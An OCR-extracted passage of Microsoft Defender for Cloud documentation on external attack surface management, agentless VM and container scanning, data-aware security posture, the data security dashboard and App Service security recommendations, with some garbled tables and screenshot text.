infrastructure. This visibility enables security and IT teams to identify unknowns, 
prioritize risk, eliminate threats, and extend vulnerability and exposure control beyond 
the firewall. 


Defender EASM applies Microsoft's crawling technology to discover assets that are 
related to your known online infrastructure, and actively scans these assets to discover 
new connections over time. Attack Surface Insights are generated by applying 
vulnerability and infrastructure data to showcase the key areas of concern for your 
organization, such as: 


e Discover digital assets, always-on inventory 

e Analyze and prioritize risks and threats 

e Pinpoint attacker-exposed weaknesses, anywhere and on-demand 
e Gain visibility into third-party attack surfaces 


EASM collects data for publicly exposed assets (“outside-in”). That data can be used by 
Defender for Cloud CSPM (“inside-out”) to assist with internet-exposure validation and 
discovery capabilities to provide better visibility to customers. 


Learn more 


You can learn more about Defender EASM, and learn about the pricing “ options 
available. 


You can also learn how to deploy Defender for EASM to your Azure resource. 


Next step 


What are the cloud security graph, attack path analysis, and the cloud security explorer? 


Learn about agentless scanning 
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Microsoft Defender for Cloud maximizes coverage on OS posture issues and extends 
beyond the reach of agent-based assessments. With agentless scanning for VMs, you 
can get frictionless, wide, and instant visibility on actionable posture issues without 


installed agents, network connectivity requirements, or machine performance impact. 


Agentless scanning for VMs provides vulnerability assessment and software inventory, 
both powered by Microsoft Defender Vulnerability Management, in Azure and Amazon 
AWS environments. Agentless scanning is available in both Defender Cloud Security 
Posture Management (CSPM) and Defender for Servers P2. 


Availability 


Aspect Details 
Release state: GA 
Pricing: Requires either Defender Cloud Security Posture Management (CSPM) or 


Microsoft Defender for Servers Plan 2 


Supported use Lv] Vulnerability assessment (powered by Defender Vulnerability 

cases: Management) 
(v) Software inventory (powered by Defender Vulnerability Management) 
© Secret scanning (Preview) 


Clouds: (v Azure Commercial clouds 
* Azure Government 
* Microsoft Azure operated by 21Vianet 
(v) Connected AWS accounts 
(v) Connected GCP projects 


Operating systems: © Windows 


OO Linux 


Instance and disk Azure 
types: Lv] Standard VMs 
* Unmanaged disks 
Lv] Virtual machine scale set - Flex 
* Virtual machine scale set - Uniform 


AWS 
© c2 


© Auto Scale instances 


Aspect Details 


* Instances with a ProductCode (Paid AMIs) 


GCP 
Lv] Compute instances 
Lv] Instance groups (managed and unmanaged) 


Encryption: Azure 
OO Unencrypted 
Encrypted — managed disks using Azure Storage encryption with 
platform-managed keys (PMK) 
* Encrypted — other scenarios using platform-managed keys (PMK) 
* Encrypted — customer-managed keys (CMK) 


AWS 

OO Unencrypted 

(v) Encrypted - PMK 
Lv] Encrypted - CMK 


GCP 

(v) Google-managed encryption key 

(v Customer-managed encryption key (CMEK) 
* Customer-supplied encryption key (CSEK) 


How agentless scanning for VMs works 


While agent-based methods use OS APIs in runtime to continuously collect security 
related data, agentless scanning for VMs uses cloud APIs to collect data. Defender for 
Cloud takes snapshots of VM disks and does an out-of-band, deep analysis of the OS 
configuration and file system stored in the snapshot. The copied snapshot doesn't leave 
the original compute region of the VM, and the VM is never impacted by the scan. 


After the necessary metadata is acquired from the disk, Defender for Cloud immediately 
deletes the copied snapshot of the disk and sends the metadata to Microsoft engines to 
analyze configuration gaps and potential threats. For example, in vulnerability 
assessment, the analysis is done by Defender Vulnerability Management. The results are 
displayed in Defender for Cloud, seamlessly consolidating agent-based and agentless 
results. 


The scanning environment where disks are analyzed is regional, volatile, isolated, and 
highly secure. Disk snapshots and data unrelated to the scan aren't stored longer than is 
necessary to collect the metadata, typically a few minutes. 


Customer account Isolated scanning environment Defender for Cloud portal 


Regional environment 


Vulnerability assessment 


b 


Scanning platform 


Virtual machine 


Disk snapshot 


Next steps 


This article explains how agentless scanning works and how it helps you collect data 
from your machines. 


e Learn more about how to enable agentless scanning for VMs. 


e Check out common questions about agentless scanning and how it affects the 
subscription/account, agentless data collection, and permissions used by agentless 


scanning. 


Common questions about cloud 


security posture management 

FAQ 

One of Microsoft Defender for Cloud's main pillars for cloud security is Cloud Security 
Posture Management (CSPM). CSPM provides you with hardening guidance that helps 


you efficiently and effectively improve your security. CSPM also gives you visibility into 
your current security situation. 


If | address only three out of four 
recommendations in a security control, 
will my secure score change? 


No. It won't change until you remediate all of the recommendations for a single 
resource. To get the maximum score for a control, you must remediate all 


recommendations for all resources. 


If a security control offers me zero 
points towards my secure score, should 
| ignore it? 


In some cases, you'll see a control max score greater than zero, but the impact is zero. 
When the incremental score for fixing resources is negligible, it's rounded to zero. Don't 
ignore these recommendations because they still bring security improvements. The only 
exception is the "Additional Best Practice" control. Remediating these recommendations 
won't increase your score, but it will enhance your overall security. 


How does scanning affect the instances? 


Since the scanning process is an out-of-band analysis of snapshots, it doesn't impact the 
actual workloads and isn't visible by the guest operating system. 


How does scanning affect the 
account/subscription? 


The scanning process has minimal footprint on your accounts and subscriptions. 


Cloud Changes 
provider 
Azure - Adds a “VM Scanner Operator” role assignment 


- Adds a “vmScanners” resource with the relevant configurations used to 
manage the scanning process 


AWS - Adds role assignment 
- Adds authorized audience to Open|IDConnect provider 
- Snapshots are created next to the scanned volumes, in the same account, 
during the scan (typically for a few minutes) 


GCP - Adds a role assignment 


What is the Virtual Machine (VM) scan 
freshness? 


Each VM is scanned every 24 hours. 


Can | calculate the secure score at the 
resource group level? 


Secure score is calculated per Azure subscription, AWS account or GCP project. You can 
also view the secure score within the management scope such as Azure management 
group, AWS management account or GCP organization. There's no secure score per 
resource group. 


Next steps 


Learn about Defender CSPM 


About data-aware security posture 
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As digital transformation accelerates, organizations move data to the cloud at an 
exponential rate using multiple data stores such as object stores and managed/hosted 
databases. The dynamic and complex nature of the cloud has increased data threat 
surfaces and risks. This causes challenges for security teams around data visibility and 
protecting the cloud data estate. 


Data-aware security in Microsoft Defender for Cloud helps you to reduce risk to data, 
and respond to data breaches. Using data-aware security posture you can: 


e Automatically discover sensitive data resources across multiple clouds. 

e Evaluate data sensitivity, data exposure, and how data flows across the 
organization. 

e Proactively and continuously uncover risks that might lead to data breaches. 

e Detect suspicious activities that might indicate ongoing threats to sensitive data 


resources. 


Automatic discovery 


Data-aware security posture automatically and continuously discovers managed and 
shadow data resources across clouds, including different types of objects stores and 
databases. 


e Discover sensitive data using the sensitive data discovery extension that's included 
in the Defender Cloud Security Posture Management (CSPM) and Defender for 
Storage plans. 

e In addition, you can discover hosted databases and data flows in Cloud Security 
Explorer and Attack Paths. This functionality is available in the Defender CSPM 
plan, and isn't dependent on the sensitive data discovery extension. 


Smart sampling 


Defender for Cloud uses smart sampling to discover a selected number of assets in your 
cloud data stores. Smart sampling results discover evidence of sensitive data issues, 


while saving on discovery costs and time. 


Data security in Defender CSPM 


Defender CSPM provides visibility and contextual insights into your organizational 
security posture. The addition of data-aware security posture to the Defender CSPM 
plan enables you to proactively identify and prioritize critical data risks, distinguishing 
them from less risky issues. 


Attack paths 


Attack path analysis helps you to address security issues that pose immediate threats, 
and have the greatest potential for exploit in your environment. Defender for Cloud 
analyzes which security issues are part of potential attack paths that attackers could use 
to breach your environment. It also highlights the security recommendations that need 
to be resolved in order to mitigate the risks. 


You can discover risk of data breaches by attack paths of internet-exposed VMs that 
have access to sensitive data stores. Hackers can exploit exposed VMs to move laterally 
across the enterprise to access these stores. Review attack paths. 


Cloud Security Explorer 


Cloud Security Explorer helps you identify security risks in your cloud environment by 
running graph-based queries on Cloud Security Graph (Defender for Cloud's context 
engine). You can prioritize your security team's concerns, while taking your 
organization's specific context and conventions into account. 


You can leverage Cloud Security Explorer query templates, or build your own queries, to 
find insights about misconfigured data resources that are publicly accessible and 
contain sensitive data, across multicloud environments. You can run queries to examine 
security issues, and to get environment context into your asset inventory, exposure to 
the internet, access controls, data flows, and more. Review cloud graph insights. 


Data security in Defender for Storage 


Defender for Storage monitors Azure storage accounts with advanced threat detection 
capabilities. It detects potential data breaches by identifying harmful attempts to access 
or exploit data, and by identifying suspicious configuration changes that could lead to a 
breach. 


When early suspicious signs are detected, Defender for Storage generates security 
alerts, allowing security teams to quickly respond and mitigate. 


By applying sensitivity information types and Microsoft Purview sensitivity labels on 
storage resources, you can easily prioritize the alerts and recommendations that focus 
on sensitive data. 


Learn more about sensitive data discovery in Defender for Storage. 


Data sensitivity settings 


Data sensitivity settings define what's considered sensitive data in your organization. 
Data sensitivity values in Defender for Cloud are based on: 


e Predefined sensitive information types: Defender for Cloud uses the built-in 
sensitive information types in Microsoft Purview. This ensures consistent 
classification across services and workloads. Some of these types are enabled by 
default in Defender for Cloud. You can modify these defaults. 

e Custom information types/labels: You can optionally import custom sensitive 
information types and labels that you've defined in the Microsoft Purview 
compliance portal. 

e Sensitive data thresholds: In Defender for Cloud you can set the threshold for 
sensitive data labels. The threshold determines minimum confidence level for a 
label to be marked as sensitive in Defender for Cloud. Thresholds make it easier to 
explore sensitive data. 


When discovering resources for data sensitivity, results are based on these settings. 


When you enable data-aware security capabilities with the sensitive data discovery 
component in the Defender CSPM or Defender for Storage plans, Defender for Cloud 
uses algorithms to identify data resources that appear to contain sensitive data. 
Resources are labeled in accordance with data sensitivity settings. 


Changes in sensitivity settings take effect the next time that resources are discovered. 


Next steps 


e Prepare and review requirements for data-aware security posture management. 


e Understanding data aware security posture - Defender for Cloud in the Field video 


Support and prerequisites for data- 
aware security posture 
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Review the requirements on this page before setting up data-aware security posture in 
Microsoft Defender for Cloud. 


Enabling sensitive data discovery 


Sensitive data discovery is available in the Defender CSPM and Defender for Storage 
plans. 


e When you enable one of the plans, the sensitive data discovery extension is turned 
on as part of the plan. 

e If you have existing plans running, the extension is available, but turned off by 
default. 

e Existing plan status shows as “Partial” rather than “Full” if one or more extensions 
aren't turned on. 

e The feature is turned on at the subscription level. 

e |f sensitive data discovery is turned on, but Defender CSPM is not enabled, only 
storage resources will be scanned. 


What's supported 


The table summarizes support for data-aware posture management. 


Support Details 


What Azure Object storage: 
data resources 
can | discover? Block blob storage accounts in Azure Storage v1/v2 


Azure Data Lake Storage Gen2 
Storage accounts behind private networks are supported. 


Storage accounts encrypted with a customer-managed server-side key are 
supported. 


Accounts aren't supported if any of these settings are enabled: Public network 
access is disabled; Storage account is defined as Azure DNS Zone Z ; The 
storage account endpoint has a custom domain mapped to it. 


Support 


What AWS data 
resources can | 
discover? 


What GCP data 
resources can | 
discover? 


What 
permissions do | 
need for 
discovery? 


What file types 
are supported 
for sensitive 
data discovery? 


What Azure 
regions are 
supported? 


Details 


Databases 


Azure SQL Databases (Public preview) 


Object storage: 
AWS S3 buckets 


Defender for Cloud can discover KMS-encrypted data, but not data encrypted 
with a customer-managed key. 


Databases 


Any flavor of RDS instances (Public preview) 


GCP storage buckets 
Standard Class 
Geo: region, dual region, multi region 


Storage account: Subscription Owner 

or 

Microsoft.Authorization/roleAssignments/* (read, write, delete) and 
Microsoft.Security/pricings/* (read, write, delete) and 

Microsoft. Security/pricings/SecurityOperators (read, write) 


Amazon S3 buckets and RDS instances: AWS account permission to run Cloud 
Formation (to create a role). 


GCP storage buckets: Google account permission to run script (to create a 
role). 


Supported file types (you can't select a subset) - .doc, .docm, .docx, .dot, .gz, 
.odp, .ods, .odt, .pdf, .pot, .pps, .ppsx, .ppt, .pptm, .pptx, .xlc, .xls, .xlsb, .xlsm, 
xlsx, .xlt, .csv, json, DEN, .Ssv, .tsv, .txt., xml, parquet, .avro, .orc. 


You can discover Azure storage accounts in: 


Australia Central; Australia Central 2; Australia East; Australia Southeast; Brazil 
South; Canada Central; Canada East; Central India; Central US; East Asia; East 
US; East US 2; France Central; Germany West Central; Japan East; Japan West: 
Jio India West: North Central US; North Europe; Norway East; South Africa 
North: South Central US; South India; Sweden Central; Switzerland North; UAE 
North; UK South; UK West: West Central US; West Europe; West US, West US3. 


Support 


What AWS 
regions are 
supported? 


What GCP 
regions are 
supported? 


Do | need to 
install an agent? 


What's the cost? 


What 
permissions do | 
need to 
view/edit data 
sensitivity 
settings? 


What 
permissions do | 
need to perform 
onboarding? 


Details 


You can discover Azure SQL Databases in any region where Defender CSPM 
and Azure SQL Databases are supported. 


S3: 


Asia Pacific (Mumbai); Asia Pacific (Singapore); Asia Pacific (Sydney); Asia Pacific 
(Tokyo); Canada (Montreal); Europe (Frankfurt); Europe (Ireland); Europe 
(London); Europe (Paris); Europe (Stockholm); South America (São Paulo); US 
East (Ohio); US East (N. Virginia); US West (N. California): US West (Oregon). 


RDS: 


Africa (Capetown); Asia Pacific (Hong Kong SAR); Asia Pacific (Hyderabad); Asia 
Pacific (Melbourne); Asia Pacific (Mumbai); Asia Pacific (Osaka); Asia Pacific 
(Seoul); Asia Pacific (Singapore); Asia Pacific (Sydney); Asia Pacific (Tokyo); 
Canada (Central); Europe (Frankfurt); Europe (Ireland); Europe (London); Europe 
(Paris); Europe (Stockholm); Europe (Zurich); Middle East (UAE); South America 
(São Paulo); US East (Ohio); US East (N. Virginia); US West (N. California): US 
West (Oregon). 


Discovery is done locally within the region. 


europe-west1, us-east1, us-west1, us-central1, us-east4, asia-south1, 
northamerica-northeast1 


No, discovery requires no agent installation. 


The feature is included with the Defender CSPM and Defender for Storage 
plans, and doesn't incur additional costs except for the respective plan costs. 


You need one of these Microsoft Entra roles: Global Administrator, Compliance 
Administrator, Compliance Data Administrator, Security Administrator, Security 
Operator. 


You need one of these Microsoft Entra roles: Security Admin, Contributor, 
Owner on the subscription level (where the GCP project/s reside in). For 
consuming the security findings: Security Reader, Security Admin, Reader, 
Contributor, Owner on the subscription level (where the GCP project/s reside). 


Configuring data sensitivity settings 


The main steps for configuring data sensitivity setting include: 


e Import custom sensitive info types/labels from Microsoft Purview compliance 
portal 

e Customize sensitive data categories/types 

e Set the threshold for sensitivity labels 


Learn more about sensitivity labels in Microsoft Purview. 


Discovery 


Defender for Cloud starts discovering data immediately after enabling a plan, or after 
turning on the feature in plans that are already running. 


For object storage: 


e It takes up to 24 hours to see the results for a first-time discovery. 

e After files are updated in the discovered resources, data is refreshed within eight 
days. 

e A new Azure storage account that's added to an already discovered subscription is 
discovered within 24 hours or less. 

e Anew AWS S3 bucket or GCP storage bucket that's added to an already 
discovered AWS account or Google account is discovered within 48 hours or less. 


For databases: 


e Databases are scanned on a weekly basis. 
e For newly enabled subscriptions, results will appear within 24 hours. 


Discovering AWS S3 buckets 


In order to protect AWS resources in Defender for Cloud, you set up an AWS connector, 
using a CloudFormation template to onboard the AWS account. 


e To discover AWS data resources, Defender for Cloud updates the CloudFormation 
template. 

e The CloudFormation template creates a new role in AWS IAM, to allow permission 
for the Defender for Cloud scanner to access data in the S3 buckets. 

e To connect AWS accounts, you need Administrator permissions on the account. 

e The role allows these permissions: S3 read only; KMS decrypt. 


Discovering AWS RDS instances 


To protect AWS resources in Defender for Cloud, set up an AWS connector using a 
CloudFormation template to onboard the AWS account. 


e To discover AWS RDS instances, Defender for Cloud updates the CloudFormation 
template. 

e The CloudFormation template creates a new role in AWS IAM, to allow permission 
for the Defender for Cloud scanner to take the last available automated snapshot 
of your instance and bring it online in an isolated scanning environment within the 
same AWS region. 

e To connect AWS accounts, you need Administrator permissions on the account. 

e Automated snapshots need to be enabled on the relevant RDS Instances/Clusters. 

e The role allows these permissions (review the CloudFormation template for exact 
definitions): 

o List all RDS DBs/clusters 

o Copy all DB/cluster snapshots 

o Delete/update DB/cluster snapshot with prefix defenderfordatabases 
o List all KMS keys 

o Use all KMS keys only for RDS on source account 

o Full control on all KMS keys with tag prefix DefenderForDatabases 

o Create alias for KMS keys 


Discovering GCP storage buckets 


In order to protect GCP resources in Defender for Cloud, you can set up a Google 
connector using a script template to onboard the GCP account. 


e To discover GCP storage buckets, Defender for Cloud updates the script template. 

e The script template creates a new role in the Google account to allow permission 
for the Defender for Cloud scanner to access data in the GCP storage buckets. 

e To connect Google accounts, you need Administrator permissions on the account. 


Exposed to the internet/allows public access 


Defender CSPM attack paths and cloud security graph insights include information 
about storage resources that are exposed to the internet and allow public access. The 
following table provides more details. 


State Azure storage accounts AWS S3 Buckets GCP Storage Buckets 
Exposed An Azure storage account An AWS S3 bucket is All GCP storage buckets 
to the is considered exposed to considered exposed to the are exposed to the internet 


internet the internet if either of internet if the AWS by default. 


State 


Allows 
public 
access 


Azure storage accounts 


these settings enabled: 


Storage_account_name > 
Networking > Public 
network access > Enabled 
from all networks 


or 


Storage_account_name > 
Networking > Public 
network access > Enable 
from selected virtual 
networks and IP 
addresses. 


An Azure storage account 
container is considered as 
allowing public access if 
these settings are enabled 
on the storage account: 


Storage_account_name > 
Configuration > Allow 
blob public access > 
Enabled. 


and either of these 
settings: 


Storage_account_name > 
Containers > 
container_name > Public 
access level set to Blob 
(anonymous read access 
for blobs only) 


Or, storage_account_name 
> Containers > 
container_name > Public 
access level set to 
Container (anonymous 
read access for containers 
and blobs). 


AWS S3 Buckets 


account/AWS S3 bucket 
policies don't have a 
condition set for IP 
addresses. 


An AWS S3 bucket is 
considered to allow public 
access if both the AWS 
account and the AWS S3 
bucket have Block all 
public access set to Off, 
and either of these 
settings is set: 


In the policy, 
RestrictPublicBuckets isn't 
enabled, and the Principal 
setting is set to * and 
Effect is set to Allow. 


Or, in the access control 
list, IgnorePublicAcl isn't 
enabled, and permission is 
allowed for Everyone, or 
for Authenticated users. 


GCP Storage Buckets 


A GCP storage bucket is 
considered to allow public 
access if: it has an IAM 
(Identity and Access 
Management) role that 
meets these criteria: 


The role is granted to the 
principal allUsers or 
allAuthenticatedUsers. 


The role has at least one 
storage permission that 
isn't 
storage.buckets.create or 
storage.buckets.list. Public 
access in GCP is called 
“Public to internet”. 


Database resources do not allow public access but can still be exposed to the internet. 


Internet exposure insights are available for the following resources: 
Azure: 


e Azure SQL server 

e Azure Cosmos DB 

e Azure SQL Managed Instance 

e Azure MySQL Single Server 

e Azure MySQL Flexible Server 

e Azure PostgreSQL Single Server 
e Azure PostgreSQL Flexible Server 
e Azure MariaDB Single Server 

e Synapse Workspace 


AWS: 


e RDS instance 


© Note 


e Exposure rules that include 0.0.0.0/0 are considered “excessively exposed”, 
meaning that they can be accessed from any public IP. 
e Azure resources with the exposure rule “0.0.0.0” are accessible from any 


resource in Azure (regardless of tenant or subscription). 


Next steps 


Enable data-aware security posture. 


Data security dashboard 
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The data security dashboard addresses the need for an interactive, data-centric security 
dashboard that illuminates significant risks to customers’ sensitive data. This tool 


effectively prioritizes alerts and potential attack paths for data across multicloud data 


resources, making data protection management less overwhelming and more effective. 


Capabilities 


e You can view a centralized summary of your cloud data estate that identifies the 


location of sensitive data, so that you can discover the most critical data resources 


affected. 


e You can identify the data resources that are at risk and that require attention, so 


that you can prioritize actions that explore, prevent and respond to sensitive data 


breaches. 


e Investigate active high severity threats that lead to sensitive data 


e Explore potential threats data by highlighting attack paths that lead to sensitive 


data. 


e Explore useful data insights by highlighting useful data queries in the security 


explorer. 


You can select any element on the page to get more detailed information. 


Aspect 
Release state: 


Prerequisites: 


Required roles and 
permissions: 


Clouds: 


Prerequisites 


Details 
Public Preview 


Defender for CSPM fully enabled, including sensitive data 
discovery 

Workload protection for database and storage to explore active 
risks 


No other roles needed on top of what is required for the security 
explorer. 


© Commercial clouds 
X! Azure Government 
X! Azure China 21Vianet 


In order to view the dashboard, you must enable Defender CSPM and also enable the 
sensitive data discovery extensions button underneath. In addition, to receive the alerts 
for data sensitivity, you must also enable the Defender for Storage plan. 


A Search resources, services, and docs (G+/) 


Home > Microsoft Defender for Cloud | Environment settings > Settings | Defender plans 


Settings & monitoring 


When you enable an extension, it will be installed on any new or existing resource, by assigning a security policy. 


Defenders plans : Defender CSPM 


‘Component Description Defender plans Configuration Status 
Agentless scanning for machines Scans your machines for installed software and vulnerabilities without relying on agents or impacting machine i € or TEK 
performance. Learn more 
Agentless discovery for Kubernetes of information about Kubernetes cluster architecture, workload objects, and setup. Required @ ZO - Co oo 
etaik expi detection, risk hunting as part of the cloud security —— 
attack path analysis (DCSPM only). 
Container registries vulnerability assessments Provides vulnerability management for images stored in your container registries. Sh - Cr EET 


The feature is turned on at the subscription level. 


Required permissions and roles 
e To view the dashboard you must have either one of the following scenarios: 


o all of the following permissions: 
o Microsoft.Security/assessments/read 
o Microsoft.Security/assessments/subassessments/read 
o Microsoft.Security/alerts/read 


o the minimum required privileged RBAC role of Security Reader. 


e Each Azure subscription must be registered for the Microsoft.Security resource 


provider: 
1. Sign-in to the Azure portal. 
2. Select the affected subscription. 


3. In the left-side menu, select the resource provider. 


© refresh A? Feedback 


4. Search for and select the Microsoft.Security resource provider from the list. 


5. Select Register. 


Learn more about how to register for Azure resource provider. 


Data security overview section 


The data security overview section provides a general overview of your cloud data 
estate, per cloud, including all data resources, divided into storage assets, managed 
databases, and hosted databases (laaS). 


Y Scope: @ A Azure subscriptions 18 @ awSaccounts4 D GCP projects 7 


Data security overview All data resources (808) Sensitive resources (9) 
Storage assets © bin Hosted databases © í 
e GEO P 

View your organization's data estate, risks to 539 269 0 beete D 
sensitive data, and insights about your data 
resources. 

Coverage status Sensitive resources requiring attențtio 

© Dashboard shows limited data for resources without Defender CSPM/... @ These resources contain high severity alerts of 

m B —s— 

E Covered (188) I Partially covered (491)®) lf Not covered (129)@ Q 2 KO 


By coverage status - displays the limited data coverage for resources without Defender 
CSPM workload protection: 


e Covered — resources that have the necessary Defender CSPM, or Defender for 
Storage, or Defender for Databases enabled. 

e Partially covered — missing either the Defender CSPM, Defender for Storage, or 
Defender for Storage plan. Select the tooltip to present a detailed view of what is 
missing. 

e Sensitive resources — displays how many resources are sensitive. 

e Sensitive resources requiring attention - displays the number of sensitive 
resources that have either high severity security alerts or attack paths. 


Top issues 


The Top issues section provides a highlighted view of top active and potential risks to 
sensitive data. 


e Sensitive data resources with high severity alerts - summarizes the active threats 
to sensitive data resources and which data types are at risk. 


e Sensitive data resources in attack paths - summarizes the potential threats to 
sensitive data resources by presenting attack paths leading to sensitive data 
resources and which data types are at potential risk. 


e Data queries in security explorer - presents the top data-related queries in 
security explorer that helps focus on multicloud risks to sensitive data. 


Top issues 


Sensitive data resources with high severity alerts Sensitive data resources in attack paths Data queries in security explorer 
2 resource 18 resource D Exposed object storage contains sensitive data Tn 
os daaraan 1 Database copies saved on a public object storage assets Q. 
R @)  MICROSOFTAN. (I) MICROSOFTFIN.. (1 Credit Card Num. (6) EU Debit Card N. (S) Ninja FTE (S 
vi d k pat O External users with database acce: Vier. 


Closer look 


The Closer look section provides a more detailed view into the sensitive data within the 


organization. 


e Sensitive data discovery - summarizes the results of the sensitive resources 
discovered, allowing customers to explore a specific sensitive information type and 
label. 


e Internet-exposed data resources - summarizes the discovery of sensitive data 
resources that are internet-exposed for storage and managed databases. 


Closer look 
& Sensitive data discovery Manage data sensitivity settings E Internet exposed data resources 
ARO By type (522) 


A A 
Storage assets Managed databases Hosted databases 
(495) en 0 


Sensitive resources discovered 


Top sensitive info types Top sensitivity labels 
l Storage assets 


International Banking A... 5/9 EO) No sensitivity labels were found 

IP Address 3/9 = l — 

X.509 Certificate Privat... 2/9 m Not found 

Azure Batch Shared Acc... 1/9 E Q 
View all resources with sensitive info types > View all resources with sensitive labels > View all data resources exposed to the internet > 


You can select the Manage data sensitivity settings to get to the Data sensitivity page. 
The Data sensitivity page allows you to manage the data sensitivity settings of cloud 
resources at the tenant level, based on selective info types and labels originating from 
the Purview compliance portal, and customize sensitivity settings such as creating your 
own customized info types and labels, and setting sensitivity label thresholds. 


& Sensitive data discovery | Manage data sensitivity settings 


Sensitive resources discovered 


Top sensitive info types Top sensitivity labels 
N itivity label found | Storage assets 
X.509 Certificate P... 2/4 =] O SenSIivHy She Were Foun 
l Managed databases 
IP Address 2/4 EZ 
Not found 
Azure Storage Acc... 1/4 E 
View all resources with sensitive info types > View all resources with sensitive labels > 


Data resources security status 


Sensitive resources status over time - displays how data security evolves over time with 
a graph that shows the number of sensitive resources affected by alerts, attack paths, 
and recommendations within a defined period (last 30, 14, or 7 days). 


Data resources security status 


~~ Sensitive resources status overtime Last 30 days Vv 


9 


Jul 30 Aug 06 Aug 13 Aug 20 GO 


Next steps 


e Learn more about data-aware security posture. 
e Learn how to enable Defender CSPM. 


Agentless container posture 


Article e 08/30/2023 


Agentless container posture provides a holistic approach to improving your container 
posture within Defender CSPM (Cloud Security Posture Management). You can visualize 
and hunt for risks and threats to Kubernetes environments with attack path analysis and 
the cloud security explorer, and leverage agentless discovery and visibility within 
Kubernetes components. 


Learn more about CSPM. 


Capabilities 


For support and prerequisites for agentless containers posture, see Support and 
prerequisites for agentless containers posture. 


Agentless container posture provides the following capabilities: 


e Agentless discovery and visibility within Kubernetes components. 

e Container registry vulnerability assessment provides vulnerability assessment for all 
container images, with near real-time scan of new images and daily refresh of 
results for maximum visibility to current and emerging vulnerabilities, enriched 
with exploitability insights, and added to Defender CSPM security graph for 
contextual risk assessment and calculation of attack paths. 

e Using Kubernetes attack path analysis to visualize risks and threats to Kubernetes 
environments. 

e Using cloud security explorer for risk hunting by querying various risk scenarios, 
including viewing security insights, such as internet exposure, and other predefined 
security scenarios. For more information, search for Kubernetes in the list of 


Insights. 


All of these capabilities are available as part of the Defender CSPM plan. 


Agentless discovery and visibility within 
Kubernetes components 


Agentless discovery for Kubernetes provides API-based discovery of information about 
Kubernetes cluster architecture, workload objects, and setup. For more information, see 
Agentless discovery for Kubernetes. 


What's the refresh interval? 


Agentless information in Defender CSPM is updated through a snapshot mechanism. It 
can take up to 24 hours to see results in attack paths and the cloud security explorer. 


Next steps 


e Learn about support and prerequisites for agentless containers posture 


e Learn how to enable agentless containers 


Security recommendations - a reference 
guide 


Article e 09/27/2023 


This article lists the recommendations you might see in Microsoft Defender for Cloud. 
The recommendations shown in your environment depend on the resources you're 


protecting and your customized configuration. 


Recommendations in Defender for Cloud are based on the Microsoft cloud security 
benchmark. the Microsoft cloud security benchmark is the Microsoft-authored set of 
guidelines for security and compliance best practices based on common compliance 
frameworks. This widely respected benchmark builds on the controls from the Center for 
Internet Security (CIS) “ and the National Institute of Standards and Technology 

(NIST) SZ with a focus on cloud-centric security. 


To learn about how to respond to these recommendations, see Remediate 
recommendations in Defender for Cloud. 


Your secure score is based on the number of security recommendations you've 
completed. To decide which recommendations to resolve first, look at the severity of 
each one and its potential impact on your secure score. 


Q Tip 


If a recommendation's description says "No related policy", it's usually because that 
recommendation is dependent on a different recommendation and its policy. For 
example, the recommendation "Endpoint protection health failures should be 
remediated...", relies on the recommendation that checks whether an endpoint 
protection solution is even installed ("Endpoint protection solution should be 
installed..."). The underlying recommendation does have a policy. Limiting the 
policies to only the foundational recommendation simplifies policy management. 


AppServices recommendations 


There are 26 recommendations in this category. 


Recommendation Description Severity 


API App should only be Use of HTTPS ensures server/service authentication Medium 
accessible over HTTPS Z and protects data in transit from network layer 


Recommendation 


CORS should not allow every 
resource to access API Apps £ 


CORS should not allow every 
resource to access Function 
Apps & 


CORS should not allow every 
resource to access Web 
Applications Z 


Diagnostic logs in App Service 
should be enabled Z 


Ensure API app has Client 
Certificates Incoming client 
certificates set to On Z 


FTPS should be required in 
API apps £ 


FTPS should be required in 
function apps £ 


FTPS should be required in 
web apps E 


Description 


eavesdropping attacks. 
(Related policy: API App should only be accessible 
over HTTPS %) 


Cross-Origin Resource Sharing (CORS) should not 
allow all domains to access your API app. Allow only 
required domains to interact with your API app. 
(Related policy: CORS should not allow every 
resource to access your API App £) 


Cross-Origin Resource Sharing (CORS) should not 
allow all domains to access your Function app. Allow 
only required domains to interact with your Function 
app. 

(Related policy: CORS should not allow every 
resource to access your Function Apps Z) 


Cross-Origin Resource Sharing (CORS) should not 
allow all domains to access your web application. 
Allow only required domains to interact with your 
web app. 

(Related policy: CORS should not allow every 
resource to access your Web Applications £ ) 


Audit enabling of diagnostic logs on the app. 

This enables you to recreate activity trails for 
investigation purposes if a security incident occurs or 
your network is compromised 

(No related policy) 


Client certificates allow for the app to request a 
certificate for incoming requests. Only clients that 
have a valid certificate will be able to reach the app. 
(Related policy: Ensure API app has ‘Client Certificates 
(Incoming client certificates)’ set to 'On' £ ) 


Enable FTPS enforcement for enhanced security 
(Related policy: FTPS only should be required in your 
API App £) 


Enable FTPS enforcement for enhanced security 
(Related policy: FTPS only should be required in your 
Function App Z) 


Enable FTPS enforcement for enhanced security 
(Related policy: FTPS should be required in your Web 
App =) 


Severity 


Low 


Low 


Low 


Medium 


Medium 


High 


High 


High 


Recommendation 


Function App should only be 
accessible over HTTPS Z 


Function apps should have 
Client Certificates (Incoming 
client certificates) enabled Z 


Java should be updated to the 
latest version for API apps Z 


Managed identity should be 
used in API apps E 


Managed identity should be 
used in function apps £ 


Managed identity should be 
used in web apps E 


Description 


Use of HTTPS ensures server/service authentication 
and protects data in transit from network layer 
eavesdropping attacks. 

(Related policy: Function App should only be 
accessible over HTTPS SZ) 


Client certificates allow for the app to request a 
certificate for incoming requests. Only clients with 
valid certificates will be able to reach the app. 
(Related policy: Function apps should have ‘Client 
Certificates (Incoming client certificates)’ enabled £ ) 


Periodically, newer versions are released for Java 
either due to security flaws or to include additional 
functionality. 

Using the latest Python version for API apps is 
recommended to benefit from security fixes, if any, 
and/or new functionalities of the latest version. 
(Related policy: Ensure that ‘Java version’ is the latest, 
if used as a part of the API app Z) 


For enhanced authentication security, use a managed 
identity. 

On Azure, managed identities eliminate the need for 
developers to have to manage credentials by 
providing an identity for the Azure resource in Azure 
AD and using it to obtain Azure Active Directory 
(Azure AD) tokens. 

(Related policy: Managed identity should be used in 
your API App £) 


For enhanced authentication security, use a managed 
identity. 

On Azure, managed identities eliminate the need for 
developers to have to manage credentials by 
providing an identity for the Azure resource in Azure 
AD and using it to obtain Azure Active Directory 
(Azure AD) tokens. 

(Related policy: Managed identity should be used in 
your Function App £ ) 


For enhanced authentication security, use a managed 
identity. 

On Azure, managed identities eliminate the need for 
developers to have to manage credentials by 
providing an identity for the Azure resource in Azure 
AD and using it to obtain Azure Active Directory 
(Azure AD) tokens. 


Severity 


Medium 


Medium 


Medium 


Medium 


Medium 


Medium 


Recommendation 


